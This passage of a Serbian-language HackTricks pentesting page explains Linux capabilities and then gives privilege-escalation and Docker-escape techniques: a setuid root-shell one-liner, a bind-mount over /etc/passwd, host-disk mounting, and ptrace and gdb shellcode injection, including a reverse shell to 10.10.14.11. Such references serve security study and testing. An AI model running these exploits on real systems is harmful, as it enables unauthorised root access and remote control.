mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
1534 lines
64 KiB
Markdown
1534 lines
64 KiB
Markdown
# Linux Capabilities
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|
||
|
||
|
||
## Linux Capabilities
|
||
|
||
Linux capabilities dele **root privilegije na manje, različite jedinice**, omogućavajući procesima da imaju podskup privilegija. Ovo minimizira rizike ne dodeljujući nepotrebno pune root privilegije.
|
||
|
||
### Problem:
|
||
|
||
- Normalni korisnici imaju ograničena ovlašćenja, što utiče na zadatke kao što je otvaranje mrežnog soketa koji zahteva root pristup.
|
||
|
||
### Skupovi privilegija:
|
||
|
||
1. **Nasleđene (CapInh)**:
|
||
|
||
- **Svrha**: Određuje privilegije koje se prenose sa roditeljskog procesa.
|
||
- **Funkcionalnost**: Kada se kreira novi proces, on nasleđuje privilegije iz ovog skupa od svog roditelja. Korisno za održavanje određenih privilegija tokom pokretanja procesa.
|
||
- **Ograničenja**: Proces ne može steći privilegije koje njegov roditelj nije posedovao.
|
||
|
||
2. **Efikasne (CapEff)**:
|
||
|
||
- **Svrha**: Predstavlja stvarne privilegije koje proces koristi u bilo kojem trenutku.
|
||
- **Funkcionalnost**: To je skup privilegija koje kernel proverava da bi odobrio dozvolu za razne operacije. Za datoteke, ovaj skup može biti oznaka koja ukazuje da li su dozvoljene privilegije datoteke efikasne.
|
||
- **Značaj**: Efikasan skup je ključan za trenutne provere privilegija, delujući kao aktivan skup privilegija koje proces može koristiti.
|
||
|
||
3. **Dozvoljene (CapPrm)**:
|
||
|
||
- **Svrha**: Definiše maksimalni skup privilegija koje proces može posedovati.
|
||
- **Funkcionalnost**: Proces može podići privilegiju iz dozvoljenog skupa u svoj efikasan skup, dajući mu mogućnost da koristi tu privilegiju. Takođe može odbaciti privilegije iz svog dozvoljenog skupa.
|
||
- **Granica**: Deluje kao gornja granica za privilegije koje proces može imati, osiguravajući da proces ne premaši svoj unapred definisani opseg privilegija.
|
||
|
||
4. **Ograničene (CapBnd)**:
|
||
|
||
- **Svrha**: Postavlja plafon na privilegije koje proces može steći tokom svog životnog ciklusa.
|
||
- **Funkcionalnost**: Čak i ako proces ima određenu privilegiju u svom nasledivom ili dozvoljenom skupu, ne može steći tu privilegiju osim ako nije i u ograničenom skupu.
|
||
- **Upotreba**: Ovaj skup je posebno koristan za ograničavanje potencijala eskalacije privilegija procesa, dodajući dodatni sloj sigurnosti.
|
||
|
||
5. **Ambijent (CapAmb)**:
|
||
- **Svrha**: Omogućava održavanje određenih privilegija tokom `execve` sistemskog poziva, što obično rezultira potpunim resetovanjem privilegija procesa.
|
||
- **Funkcionalnost**: Osigurava da ne-SUID programi koji nemaju povezane privilegije datoteka mogu zadržati određene privilegije.
|
||
- **Ograničenja**: Privilegije u ovom skupu podložne su ograničenjima nasledivih i dozvoljenih skupova, osiguravajući da ne premaše dozvoljena privilegije procesa.
|
||
```python
|
||
# Code to demonstrate the interaction of different capability sets might look like this:
|
||
# Note: This is pseudo-code for illustrative purposes only.
|
||
def manage_capabilities(process):
|
||
if process.has_capability('cap_setpcap'):
|
||
process.add_capability_to_set('CapPrm', 'new_capability')
|
||
process.limit_capabilities('CapBnd')
|
||
process.preserve_capabilities_across_execve('CapAmb')
|
||
```
|
||
Za više informacija proverite:
|
||
|
||
- [https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work](https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work)
|
||
- [https://blog.ploetzli.ch/2014/understanding-linux-capabilities/](https://blog.ploetzli.ch/2014/understanding-linux-capabilities/)
|
||
|
||
## Procesi i Binarne Kapacitete
|
||
|
||
### Kapacitete Procesa
|
||
|
||
Da biste videli kapacitete za određeni proces, koristite **status** datoteku u /proc direktorijumu. Kako pruža više detalja, ograničimo se samo na informacije vezane za Linux kapacitete.\
|
||
Napomena: za sve pokrenute procese informacije o kapacitetima se održavaju po niti, dok se za binarne datoteke u datotečnom sistemu čuvaju u proširenim atributima.
|
||
|
||
Možete pronaći kapacitete definisane u /usr/include/linux/capability.h
|
||
|
||
Možete pronaći kapacitete trenutnog procesa u `cat /proc/self/status` ili koristeći `capsh --print` i drugih korisnika u `/proc/<pid>/status`
|
||
```bash
|
||
cat /proc/1234/status | grep Cap
|
||
cat /proc/$$/status | grep Cap #This will print the capabilities of the current process
|
||
```
|
||
Ova komanda bi trebala da vrati 5 redova na većini sistema.
|
||
|
||
- CapInh = Nasleđene sposobnosti
|
||
- CapPrm = Dozvoljene sposobnosti
|
||
- CapEff = Efikasne sposobnosti
|
||
- CapBnd = Ograničeni skup
|
||
- CapAmb = Skup ambijentalnih sposobnosti
|
||
```bash
|
||
#These are the typical capabilities of a root owned process (all)
|
||
CapInh: 0000000000000000
|
||
CapPrm: 0000003fffffffff
|
||
CapEff: 0000003fffffffff
|
||
CapBnd: 0000003fffffffff
|
||
CapAmb: 0000000000000000
|
||
```
|
||
Ove heksadecimalne brojeve nemaju smisla. Koristeći capsh alat, možemo ih dekodirati u imena sposobnosti.
|
||
```bash
|
||
capsh --decode=0000003fffffffff
|
||
0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37
|
||
```
|
||
Hajde da proverimo sada **capabilities** koje koristi `ping`:
|
||
```bash
|
||
cat /proc/9491/status | grep Cap
|
||
CapInh: 0000000000000000
|
||
CapPrm: 0000000000003000
|
||
CapEff: 0000000000000000
|
||
CapBnd: 0000003fffffffff
|
||
CapAmb: 0000000000000000
|
||
|
||
capsh --decode=0000000000003000
|
||
0x0000000000003000=cap_net_admin,cap_net_raw
|
||
```
|
||
Iako to funkcioniše, postoji još jedan i lakši način. Da biste videli mogućnosti pokrenutog procesa, jednostavno koristite alat **getpcaps** praćen njegovim ID-jem procesa (PID). Takođe možete navesti listu ID-eva procesa.
|
||
```bash
|
||
getpcaps 1234
|
||
```
|
||
Hajde da proverimo ovde mogućnosti `tcpdump` nakon što smo binarnoj datoteci dali dovoljno mogućnosti (`cap_net_admin` i `cap_net_raw`) da presreće mrežu (_tcpdump se izvršava u procesu 9562_):
|
||
```bash
|
||
#The following command give tcpdump the needed capabilities to sniff traffic
|
||
$ setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
|
||
|
||
$ getpcaps 9562
|
||
Capabilities for `9562': = cap_net_admin,cap_net_raw+ep
|
||
|
||
$ cat /proc/9562/status | grep Cap
|
||
CapInh: 0000000000000000
|
||
CapPrm: 0000000000003000
|
||
CapEff: 0000000000003000
|
||
CapBnd: 0000003fffffffff
|
||
CapAmb: 0000000000000000
|
||
|
||
$ capsh --decode=0000000000003000
|
||
0x0000000000003000=cap_net_admin,cap_net_raw
|
||
```
|
||
Kao što možete videti, date sposobnosti odgovaraju rezultatima 2 načina dobijanja sposobnosti binarne datoteke.\
|
||
Alat _getpcaps_ koristi **capget()** sistemski poziv za upit dostupnih sposobnosti za određenu nit. Ovaj sistemski poziv samo treba da pruži PID da bi dobio više informacija.
|
||
|
||
### Sposobnosti binarnih datoteka
|
||
|
||
Binarne datoteke mogu imati sposobnosti koje se mogu koristiti tokom izvršavanja. Na primer, veoma je uobičajeno pronaći `ping` binarnu datoteku sa `cap_net_raw` sposobnošću:
|
||
```bash
|
||
getcap /usr/bin/ping
|
||
/usr/bin/ping = cap_net_raw+ep
|
||
```
|
||
Možete **pretraživati binarne datoteke sa sposobnostima** koristeći:
|
||
```bash
|
||
getcap -r / 2>/dev/null
|
||
```
|
||
### Dropping capabilities with capsh
|
||
|
||
Ako uklonimo CAP*NET_RAW sposobnosti za \_ping*, onda alatka ping više ne bi trebala da funkcioniše.
|
||
```bash
|
||
capsh --drop=cap_net_raw --print -- -c "tcpdump"
|
||
```
|
||
Osim izlaza _capsh_ samog, komanda _tcpdump_ takođe treba da izazove grešku.
|
||
|
||
> /bin/bash: /usr/sbin/tcpdump: Operacija nije dozvoljena
|
||
|
||
Greška jasno pokazuje da ping komanda nema dozvolu da otvori ICMP soket. Sada smo sigurni da ovo funkcioniše kako se očekuje.
|
||
|
||
### Ukloni Kapacitete
|
||
|
||
Možete ukloniti kapacitete binarne datoteke sa
|
||
```bash
|
||
setcap -r </path/to/binary>
|
||
```
|
||
## Korisničke sposobnosti
|
||
|
||
Naizgled **moguće je dodeliti sposobnosti i korisnicima**. To verovatno znači da će svaki proces koji izvrši korisnik moći da koristi sposobnosti korisnika.\
|
||
Na osnovu [ovoga](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [ovoga](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html) i [ovoga](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user) potrebno je konfigurisati nekoliko datoteka kako bi se korisniku dodelile određene sposobnosti, ali datoteka koja dodeljuje sposobnosti svakom korisniku biće `/etc/security/capability.conf`.\
|
||
Primer datoteke:
|
||
```bash
|
||
# Simple
|
||
cap_sys_ptrace developer
|
||
cap_net_raw user1
|
||
|
||
# Multiple capablities
|
||
cap_net_admin,cap_net_raw jrnetadmin
|
||
# Identical, but with numeric values
|
||
12,13 jrnetadmin
|
||
|
||
# Combining names and numerics
|
||
cap_sys_admin,22,25 jrsysadmin
|
||
```
|
||
## Environment Capabilities
|
||
|
||
Kompilacijom sledećeg programa moguće je **pokrenuti bash shell unutar okruženja koje pruža sposobnosti**.
|
||
```c:ambient.c
|
||
/*
|
||
* Test program for the ambient capabilities
|
||
*
|
||
* compile using:
|
||
* gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c
|
||
* Set effective, inherited and permitted capabilities to the compiled binary
|
||
* sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
|
||
*
|
||
* To get a shell with additional caps that can be inherited do:
|
||
*
|
||
* ./ambient /bin/bash
|
||
*/
|
||
|
||
#include <stdlib.h>
|
||
#include <stdio.h>
|
||
#include <string.h>
|
||
#include <errno.h>
|
||
#include <sys/prctl.h>
|
||
#include <linux/capability.h>
|
||
#include <cap-ng.h>
|
||
|
||
static void set_ambient_cap(int cap) {
|
||
int rc;
|
||
capng_get_caps_process();
|
||
rc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap);
|
||
if (rc) {
|
||
printf("Cannot add inheritable cap\n");
|
||
exit(2);
|
||
}
|
||
capng_apply(CAPNG_SELECT_CAPS);
|
||
/* Note the two 0s at the end. Kernel checks for these */
|
||
if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) {
|
||
perror("Cannot set cap");
|
||
exit(1);
|
||
}
|
||
}
|
||
void usage(const char * me) {
|
||
printf("Usage: %s [-c caps] new-program new-args\n", me);
|
||
exit(1);
|
||
}
|
||
int default_caplist[] = {
|
||
CAP_NET_RAW,
|
||
CAP_NET_ADMIN,
|
||
CAP_SYS_NICE,
|
||
-1
|
||
};
|
||
int * get_caplist(const char * arg) {
|
||
int i = 1;
|
||
int * list = NULL;
|
||
char * dup = strdup(arg), * tok;
|
||
for (tok = strtok(dup, ","); tok; tok = strtok(NULL, ",")) {
|
||
list = realloc(list, (i + 1) * sizeof(int));
|
||
if (!list) {
|
||
perror("out of memory");
|
||
exit(1);
|
||
}
|
||
list[i - 1] = atoi(tok);
|
||
list[i] = -1;
|
||
i++;
|
||
}
|
||
return list;
|
||
}
|
||
int main(int argc, char ** argv) {
|
||
int rc, i, gotcaps = 0;
|
||
int * caplist = NULL;
|
||
int index = 1; // argv index for cmd to start
|
||
if (argc < 2)
|
||
usage(argv[0]);
|
||
if (strcmp(argv[1], "-c") == 0) {
|
||
if (argc <= 3) {
|
||
usage(argv[0]);
|
||
}
|
||
caplist = get_caplist(argv[2]);
|
||
index = 3;
|
||
}
|
||
if (!caplist) {
|
||
caplist = (int * ) default_caplist;
|
||
}
|
||
for (i = 0; caplist[i] != -1; i++) {
|
||
printf("adding %d to ambient list\n", caplist[i]);
|
||
set_ambient_cap(caplist[i]);
|
||
}
|
||
printf("Ambient forking shell\n");
|
||
if (execv(argv[index], argv + index))
|
||
perror("Cannot exec");
|
||
return 0;
|
||
}
|
||
```
|
||
|
||
```bash
|
||
gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c
|
||
sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
|
||
./ambient /bin/bash
|
||
```
|
||
Unutar **bash-a koji izvršava kompajlirani ambijentalni binarni fajl** moguće je posmatrati **nove sposobnosti** (običan korisnik neće imati nikakvu sposobnost u "trenutnom" odeljku).
|
||
```bash
|
||
capsh --print
|
||
Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip
|
||
```
|
||
> [!CAUTION]
|
||
> Možete **dodati samo one sposobnosti koje su prisutne** u dozvoljenim i naslednim skupovima.
|
||
|
||
### Binarni fajlovi s sposobnostima / Binarni fajlovi bez sposobnosti
|
||
|
||
**Binarni fajlovi s sposobnostima neće koristiti nove sposobnosti** koje daje okruženje, međutim **binarni fajlovi bez sposobnosti će ih koristiti** jer ih neće odbaciti. To čini binarne fajlove bez sposobnosti ranjivim unutar posebnog okruženja koje dodeljuje sposobnosti binarnim fajlovima.
|
||
|
||
## Sposobnosti usluga
|
||
|
||
Podrazumevano, **usluga koja se pokreće kao root će imati dodeljene sve sposobnosti**, a u nekim slučajevima to može biti opasno.\
|
||
Zato, **konfiguracioni** fajl za **uslugu** omogućava da **specifikujete** **sposobnosti** koje želite da ima, **i** **korisnika** koji treba da izvrši uslugu kako bi se izbeglo pokretanje usluge sa nepotrebnim privilegijama:
|
||
```bash
|
||
[Service]
|
||
User=bob
|
||
AmbientCapabilities=CAP_NET_BIND_SERVICE
|
||
```
|
||
## Mogućnosti u Docker kontejnerima
|
||
|
||
Podrazumevano, Docker dodeljuje nekoliko mogućnosti kontejnerima. Veoma je lako proveriti koje su to mogućnosti pokretanjem:
|
||
```bash
|
||
docker run --rm -it r.j3ss.co/amicontained bash
|
||
Capabilities:
|
||
BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
|
||
|
||
# Add a capabilities
|
||
docker run --rm -it --cap-add=SYS_ADMIN r.j3ss.co/amicontained bash
|
||
|
||
# Add all capabilities
|
||
docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash
|
||
|
||
# Remove all and add only one
|
||
docker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash
|
||
```
|
||
## Privesc/Container Escape
|
||
|
||
Capabilities su korisne kada **želite da ograničite svoje procese nakon izvršavanja privilegovanih operacija** (npr. nakon postavljanja chroot-a i vezivanja za soket). Međutim, mogu se iskoristiti tako što se proslede zlonamerni komandi ili argumenti koji se zatim izvršavaju kao root.
|
||
|
||
Možete primeniti capabilities na programe koristeći `setcap`, a možete ih proveriti koristeći `getcap`:
|
||
```bash
|
||
#Set Capability
|
||
setcap cap_net_raw+ep /sbin/ping
|
||
|
||
#Get Capability
|
||
getcap /sbin/ping
|
||
/sbin/ping = cap_net_raw+ep
|
||
```
|
||
`+ep` znači da dodajete sposobnost (“-” bi je uklonio) kao Efikasnu i Dozvoljenu.
|
||
|
||
Da identifikujete programe u sistemu ili folderu sa sposobnostima:
|
||
```bash
|
||
getcap -r / 2>/dev/null
|
||
```
|
||
### Primer eksploatacije
|
||
|
||
U sledećem primeru, binarni fajl `/usr/bin/python2.6` je pronađen kao ranjiv na privesc:
|
||
```bash
|
||
setcap cap_setuid+ep /usr/bin/python2.7
|
||
/usr/bin/python2.7 = cap_setuid+ep
|
||
|
||
#Exploit
|
||
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'
|
||
```
|
||
**Capabilities** potrebne `tcpdump` da **omoguće bilo kojem korisniku da presreće pakete**:
|
||
```bash
|
||
setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
|
||
getcap /usr/sbin/tcpdump
|
||
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
|
||
```
|
||
### Poseban slučaj "praznih" sposobnosti
|
||
|
||
[Iz dokumenata](https://man7.org/linux/man-pages/man7/capabilities.7.html): Imajte na umu da se prazni skupovi sposobnosti mogu dodeliti datoteci programa, i tako je moguće kreirati program sa set-user-ID-root koji menja efektivni i sačuvani set-user-ID procesa koji izvršava program na 0, ali ne dodeljuje nikakve sposobnosti tom procesu. Ili, jednostavno rečeno, ako imate binarni fajl koji:
|
||
|
||
1. nije u vlasništvu root-a
|
||
2. nema postavljene `SUID`/`SGID` bitove
|
||
3. ima prazan skup sposobnosti (npr.: `getcap myelf` vraća `myelf =ep`)
|
||
|
||
onda **će taj binarni fajl raditi kao root**.
|
||
|
||
## CAP_SYS_ADMIN
|
||
|
||
**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** je veoma moćna Linux sposobnost, često izjednačena sa skoro-root nivoom zbog svojih opsežnih **administrativnih privilegija**, kao što su montiranje uređaja ili manipulacija funkcijama jezgra. Dok je neophodna za kontejnere koji simuliraju cele sisteme, **`CAP_SYS_ADMIN` predstavlja značajne bezbednosne izazove**, posebno u kontejnerizovanim okruženjima, zbog svog potencijala za eskalaciju privilegija i kompromitaciju sistema. Stoga, njena upotreba zahteva stroge bezbednosne procene i oprezno upravljanje, sa jakim preferencijama za odbacivanje ove sposobnosti u kontejnerima specifičnim za aplikacije kako bi se pridržavali **principa minimalnih privilegija** i smanjili površinu napada.
|
||
|
||
**Primer sa binarnim fajlom**
|
||
```bash
|
||
getcap -r / 2>/dev/null
|
||
/usr/bin/python2.7 = cap_sys_admin+ep
|
||
```
|
||
Korišćenjem Pythona možete montirati izmenjenu _passwd_ datoteku preko prave _passwd_ datoteke:
|
||
```bash
|
||
cp /etc/passwd ./ #Create a copy of the passwd file
|
||
openssl passwd -1 -salt abc password #Get hash of "password"
|
||
vim ./passwd #Change roots passwords of the fake passwd file
|
||
```
|
||
I na kraju **montirajte** izmenjenu `passwd` datoteku na `/etc/passwd`:
|
||
```python
|
||
from ctypes import *
|
||
libc = CDLL("libc.so.6")
|
||
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
|
||
MS_BIND = 4096
|
||
source = b"/path/to/fake/passwd"
|
||
target = b"/etc/passwd"
|
||
filesystemtype = b"none"
|
||
options = b"rw"
|
||
mountflags = MS_BIND
|
||
libc.mount(source, target, filesystemtype, mountflags, options)
|
||
```
|
||
I bićete u mogućnosti da **`su` kao root** koristeći lozinku "password".
|
||
|
||
**Primer sa okruženjem (Docker breakout)**
|
||
|
||
Možete proveriti omogućene sposobnosti unutar docker kontejnera koristeći:
|
||
```
|
||
capsh --print
|
||
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep
|
||
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
|
||
Securebits: 00/0x0/1'b0
|
||
secure-noroot: no (unlocked)
|
||
secure-no-suid-fixup: no (unlocked)
|
||
secure-keep-caps: no (unlocked)
|
||
uid=0(root)
|
||
gid=0(root)
|
||
groups=0(root)
|
||
```
|
||
Unutar prethodnog izlaza možete videti da je SYS_ADMIN sposobnost omogućena.
|
||
|
||
- **Mount**
|
||
|
||
Ovo omogućava docker kontejneru da **montira disk domaćina i slobodno mu pristupa**:
|
||
```bash
|
||
fdisk -l #Get disk name
|
||
Disk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors
|
||
Units: sectors of 1 * 512 = 512 bytes
|
||
Sector size (logical/physical): 512 bytes / 512 bytes
|
||
I/O size (minimum/optimal): 512 bytes / 512 bytes
|
||
|
||
mount /dev/sda /mnt/ #Mount it
|
||
cd /mnt
|
||
chroot ./ bash #You have a shell inside the docker hosts disk
|
||
```
|
||
- **Potpun pristup**
|
||
|
||
U prethodnoj metodi uspeli smo da pristupimo disku docker host-a.\
|
||
U slučaju da otkrijete da host pokreće **ssh** server, mogli biste **napraviti korisnika unutar diska docker host-a** i pristupiti mu putem SSH:
|
||
```bash
|
||
#Like in the example before, the first step is to mount the docker host disk
|
||
fdisk -l
|
||
mount /dev/sda /mnt/
|
||
|
||
#Then, search for open ports inside the docker host
|
||
nc -v -n -w2 -z 172.17.0.1 1-65535
|
||
(UNKNOWN) [172.17.0.1] 2222 (?) open
|
||
|
||
#Finally, create a new user inside the docker host and use it to access via SSH
|
||
chroot /mnt/ adduser john
|
||
ssh john@172.17.0.1 -p 2222
|
||
```
|
||
## CAP_SYS_PTRACE
|
||
|
||
**To znači da možete pobjeći iz kontejnera injektovanjem shell koda unutar nekog procesa koji se izvršava unutar hosta.** Da biste pristupili procesima koji se izvršavaju unutar hosta, kontejner treba da se pokrene barem sa **`--pid=host`**.
|
||
|
||
**[`CAP_SYS_PTRACE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** daje mogućnost korišćenja funkcionalnosti za debagovanje i praćenje sistemskih poziva koje pruža `ptrace(2)` i pozive za preuzimanje između memorija kao što su `process_vm_readv(2)` i `process_vm_writev(2)`. Iako je moćan za dijagnostičke i monitoring svrhe, ako je `CAP_SYS_PTRACE` omogućen bez restriktivnih mera poput seccomp filtera na `ptrace(2)`, može značajno oslabiti bezbednost sistema. Konkretno, može se iskoristiti za zaobilaženje drugih bezbednosnih ograničenja, posebno onih koje nameće seccomp, kao što je prikazano u [dokazima koncepta (PoC) poput ovog](https://gist.github.com/thejh/8346f47e359adecd1d53).
|
||
|
||
**Primer sa binarnim (python)**
|
||
```bash
|
||
getcap -r / 2>/dev/null
|
||
/usr/bin/python2.7 = cap_sys_ptrace+ep
|
||
```
|
||
|
||
```python
|
||
import ctypes
|
||
import sys
|
||
import struct
|
||
# Macros defined in <sys/ptrace.h>
|
||
# https://code.woboq.org/qt5/include/sys/ptrace.h.html
|
||
PTRACE_POKETEXT = 4
|
||
PTRACE_GETREGS = 12
|
||
PTRACE_SETREGS = 13
|
||
PTRACE_ATTACH = 16
|
||
PTRACE_DETACH = 17
|
||
# Structure defined in <sys/user.h>
|
||
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
|
||
class user_regs_struct(ctypes.Structure):
|
||
_fields_ = [
|
||
("r15", ctypes.c_ulonglong),
|
||
("r14", ctypes.c_ulonglong),
|
||
("r13", ctypes.c_ulonglong),
|
||
("r12", ctypes.c_ulonglong),
|
||
("rbp", ctypes.c_ulonglong),
|
||
("rbx", ctypes.c_ulonglong),
|
||
("r11", ctypes.c_ulonglong),
|
||
("r10", ctypes.c_ulonglong),
|
||
("r9", ctypes.c_ulonglong),
|
||
("r8", ctypes.c_ulonglong),
|
||
("rax", ctypes.c_ulonglong),
|
||
("rcx", ctypes.c_ulonglong),
|
||
("rdx", ctypes.c_ulonglong),
|
||
("rsi", ctypes.c_ulonglong),
|
||
("rdi", ctypes.c_ulonglong),
|
||
("orig_rax", ctypes.c_ulonglong),
|
||
("rip", ctypes.c_ulonglong),
|
||
("cs", ctypes.c_ulonglong),
|
||
("eflags", ctypes.c_ulonglong),
|
||
("rsp", ctypes.c_ulonglong),
|
||
("ss", ctypes.c_ulonglong),
|
||
("fs_base", ctypes.c_ulonglong),
|
||
("gs_base", ctypes.c_ulonglong),
|
||
("ds", ctypes.c_ulonglong),
|
||
("es", ctypes.c_ulonglong),
|
||
("fs", ctypes.c_ulonglong),
|
||
("gs", ctypes.c_ulonglong),
|
||
]
|
||
|
||
libc = ctypes.CDLL("libc.so.6")
|
||
|
||
pid=int(sys.argv[1])
|
||
|
||
# Define argument type and respone type.
|
||
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
|
||
libc.ptrace.restype = ctypes.c_uint64
|
||
|
||
# Attach to the process
|
||
libc.ptrace(PTRACE_ATTACH, pid, None, None)
|
||
registers=user_regs_struct()
|
||
|
||
# Retrieve the value stored in registers
|
||
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
|
||
print("Instruction Pointer: " + hex(registers.rip))
|
||
print("Injecting Shellcode at: " + hex(registers.rip))
|
||
|
||
# Shell code copied from exploit db. https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c
|
||
shellcode = "\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
|
||
|
||
# Inject the shellcode into the running process byte by byte.
|
||
for i in xrange(0,len(shellcode),4):
|
||
# Convert the byte to little endian.
|
||
shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
|
||
shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
|
||
shellcode_byte=int(shellcode_byte_little_endian,16)
|
||
|
||
# Inject the byte.
|
||
libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)
|
||
|
||
print("Shellcode Injected!!")
|
||
|
||
# Modify the instuction pointer
|
||
registers.rip=registers.rip+2
|
||
|
||
# Set the registers
|
||
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
|
||
print("Final Instruction Pointer: " + hex(registers.rip))
|
||
|
||
# Detach from the process.
|
||
libc.ptrace(PTRACE_DETACH, pid, None, None)
|
||
```
|
||
**Primer sa binarnim (gdb)**
|
||
|
||
`gdb` sa `ptrace` sposobnošću:
|
||
```
|
||
/usr/bin/gdb = cap_sys_ptrace+ep
|
||
```
|
||
Kreirajte shellcode sa msfvenom za ubrizgavanje u memoriju putem gdb.
|
||
```python
|
||
# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=9001 -f py -o revshell.py
|
||
buf = b""
|
||
buf += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
|
||
buf += b"\x48\x97\x48\xb9\x02\x00\x23\x29\x0a\x0a\x0e\x0b"
|
||
buf += b"\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05"
|
||
buf += b"\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
|
||
buf += b"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
|
||
buf += b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6"
|
||
buf += b"\x0f\x05"
|
||
|
||
# Divisible by 8
|
||
payload = b"\x90" * (-len(buf) % 8) + buf
|
||
|
||
# Change endianess and print gdb lines to load the shellcode in RIP directly
|
||
for i in range(0, len(buf), 8):
|
||
chunk = payload[i:i+8][::-1]
|
||
chunks = "0x"
|
||
for byte in chunk:
|
||
chunks += f"{byte:02x}"
|
||
|
||
print(f"set {{long}}($rip+{i}) = {chunks}")
|
||
```
|
||
Debugujte root proces sa gdb i kopirajte prethodno generisane gdb linije:
|
||
```bash
|
||
# Let's write the commands to a file
|
||
echo 'set {long}($rip+0) = 0x296a909090909090
|
||
set {long}($rip+8) = 0x5e016a5f026a9958
|
||
set {long}($rip+16) = 0x0002b9489748050f
|
||
set {long}($rip+24) = 0x48510b0e0a0a2923
|
||
set {long}($rip+32) = 0x582a6a5a106ae689
|
||
set {long}($rip+40) = 0xceff485e036a050f
|
||
set {long}($rip+48) = 0x6af675050f58216a
|
||
set {long}($rip+56) = 0x69622fbb4899583b
|
||
set {long}($rip+64) = 0x8948530068732f6e
|
||
set {long}($rip+72) = 0x050fe689485752e7
|
||
c' > commands.gdb
|
||
# In this case there was a sleep run by root
|
||
